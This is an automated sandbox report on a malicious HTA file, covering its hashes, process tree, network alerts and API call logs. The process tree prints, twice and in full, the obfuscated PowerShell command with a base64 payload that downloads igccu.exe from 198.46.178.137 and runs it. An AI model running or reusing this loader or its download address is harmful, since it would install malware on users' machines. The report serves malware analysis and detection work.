Summary | ZeroBOX

IEnetCache.hta

Generic Malware Antivirus AntiDebug .NET DLL PE File DLL PE32 AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 July 3, 2024, 6:25 p.m. July 3, 2024, 6:27 p.m.
Size 102.8KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 23944bdd42dd1973f4cebc54defbccd0
SHA256 117c80ef8a0014afe6b32de9cbc10e251efc921e9b4eff3459c1f0d53214e915
CRC32 9E69E7AB
ssdeep 768:tZ6A3yXNA0AGAcWsWmnDZZmei3affs6P6LKdPTvD7QiXAZO:t9qqsPD
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IEnetCache.hta.html

    2628
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2628 CREDAT:145409

      2716
      • cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"

        2948
        • powershell.exe pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"

          3008

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
198.46.178.137 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49183 -> 198.46.178.137:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 198.46.178.137:80 -> 192.168.56.101:49183 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 198.46.178.137:80 -> 192.168.56.101:49183 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f24e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efd40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efd40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3ef640
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3ef640
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3ef640
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3eff00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3eff00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3eff00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f03d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f03d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f03d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0520
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0520
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efe20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3efe20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0520
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0520
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3f0520
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f2780
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f2780
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f2780
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f2780
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b417da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b417da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4182e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4182e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b429b20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b429b20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b429b20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b429b20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224d30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224d30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224e80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224e80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://198.46.178.137/22033/igccu.exe
request GET http://198.46.178.137/22033/igccu.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2628
region_size: 8327168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002490000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2628
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c80000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2716
region_size: 2560000
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002640000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000028b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\igccu.exe
file c:\Users\test22\AppData\Local\Temp\e3c82su0.dll
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; 